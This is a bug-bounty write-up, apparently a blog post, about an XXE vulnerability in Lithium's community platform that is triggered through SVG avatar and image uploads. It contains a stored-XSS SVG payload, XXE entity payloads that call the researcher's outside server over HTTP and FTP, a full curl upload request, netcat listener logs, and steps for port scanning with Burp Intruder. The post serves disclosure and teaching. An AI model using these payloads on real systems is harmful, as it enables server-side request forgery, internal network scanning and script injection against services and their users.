XXE in Lithium Community Platform

Severity:P1(critical)

Application : community.[company].com

Vendor: Lithium Technology

Award: from different client: 4000$

There was a functionality in lithium community platform and was applicable for all 400+ clients including paypal,HP,ATT and many more ,In community.[company].com to upload avatars and image .This allows to upload svg/xml file .While uploading SVG (embedded with XML) file to the server, the server XML parser started parsing XML in server side. This caused XXE which could produce severe and dangerous effect. The XXE attack allowed an attacker to scan internal port,remote server port, upload dtd file ,FTP DOS attack and many.

How did I found this Vulnerability?

One day I was working for Bugcrowd and hunting one of the Lithium Client’s site for Bug. During that I found  avatar upload functionality of site was allowing svg file to upload  .So I  uploaded a svg file .I was able to Upload XSS code successfully and it produced a Link which was stored XSS link.

CODE:–

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript"> prompt('paswword please!');</script>

 

I reported to Bugcrowd.10 days after reporting this bug I again realised that Uploading svg file can also cause XXE  if server  parsed it. So then I uploaded OOB Xml code and found more severe vulnerability than XSS which was XXE.

Below were the few things which I was able to prove it.

1)Proved causing OOB XXE to my server vps0007.dasaweb.co.uk

2)Proved causing SSRF and internal port SCAN

3)Proved causing FTP DOS as FTP connection happening to my server vps0007.dasaweb.co.uk

4)information disclosure in USER AGENT

5)There are many things  like execution of script which I have not proved.

STEP BY STEP POC:–

1)Logged in Community.[company].com

Go to either https://community.[company].com/t5/media/gallerypage/user-id/User-ID or https://community.[company].com/t5/user/myprofilepage/tab/user-icons

Image Upload option is https://community.[company].com/t5/media/gallerypage/user-id/User-ID

Avatar Upload Option is https://community.[company].com/t5/user/myprofilepage/tab/user-icons

2)I had SVG file with XML code embeded below

<?xml version="1.0" ?><!DOCTYPE r [ <!ELEMENT r ANY >

<!ENTITY sp SYSTEM "http://vps0007.dasaweb.co.uk:9001/data.xml">

]><r>&sp;</r>

3)Uploaded it either going through Browser option of add image or avatar upload.Now upload the svg file embedded xml       

 3a)The request will be like below

REQUEST WILL BE LIKE THIS

curl -i -s -k -X $'POST' \
   -H $'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0' -H $'X-Requested-With: XMLHttpRequest' -H $'Referer: https://community.[company].com/t5/user/myprofilepage/tab/user-icons' -H $'Content-Type: multipart/form-data; boundary=---------------------------39612053628921' \
   -b $'REMOVED'\
   --data-binary $'-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"anonAction\"\x0d\x0a\x0d\x0atrue\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"t:ac\"\x0d\x0a\x0d\x0atab/user-icons\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"t:cp\"\x0d\x0a\x0d\x0ablock/propertyeditblocks\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"Filename\"\x0d\x0a\x0d\x0axxe_svg.svg\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"Filesize\"\x0d\x0a\x0d\x0a251\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"Filedata\"; filename=\"xxe_svg.svg\"\x0d\x0aContent-Type: image/svg+xml\x0d\x0a\x0d\x0a<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM \"FTP:// vps0007.dasaweb.co.uk:\xa79001\xa7\" > ]><svg width=\"500px\" height=\"40px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\">&xxe;</svg>\x0d\x0a-----------------------------39612053628921\x14\x0d\x0a' \ $'https://community.company.com/t5/user/myprofilepage.imageuploadeditor:uploadimage?t:ac=tab/user-icons&t:cp=block/propertyeditblocks'

 

4) Now I saw the request in my server where netcat is enable .

listening on [37.59.68.106] 9001 ...

connect to [37.59.68.106] from xxx.lithium.com [46.19.168.9] 56830

GET /data.xml HTTP/1.1

User-Agent: Java/1.8.0_66

Host: vps0007.dasaweb.co.uk:9001

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: keep-alive

5)Now change the code of xml in svg file by putting FTP

 

<?xml version="1.0" ?><!DOCTYPE r [ <!ELEMENT r ANY >

<!ENTITY sp SYSTEM "FTP://vps0007.dasaweb.co.uk:9001/data.xml">

]>

<r>&sp;</r>

6)Upload it and check the request in my server where netcat is enable from ams1-nat.lithium.com

 

listening on [37.59.68.106] 9001 ...

connect to [37.59.68.106] from xxx.lithium.com [46.19.168.9] 55535

6)Now Intercept the request of upload of svg file in BURP and send to intruder

 7)Now FUZZ the PORT as here it is 9001 FTP:// vps0007.dasaweb.co.uk:§9001§”

Fuzz it from 20 to 90 in intruder and remember to put number of thread in intruder as 1.I have port 80 and 22,23 open.

You can see below port 22,23 and 80 has timeout timings which means it is open. Similarly I did for Internal Ip and able to do Internal port scan.

8) See the User agent .you can see the information leakage.

Connect to [37.59.68.106] from ams1-nat.lithium.com [46.19.168.9] 48550

GET / HTTP/1.1
User-Agent: Java/1.8.0_66
Host: vps0007.dasaweb.co.uk:9001
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

 

Rewards and recognsation:–

Company Sites Award &Recog
Bugcrowd Client 2000$
ING Bank Many sites Awarded with cash
Paypal Community sites 500$
Ubiquity Network Community 500$
Many Others Sites 1000$

 

 

Published by

Vibhuti

Hey! I am a security Researcher ,Tester and Hacker.Finding bug is my passion .

Leave a Reply

Your email address will not be published. Required fields are marked *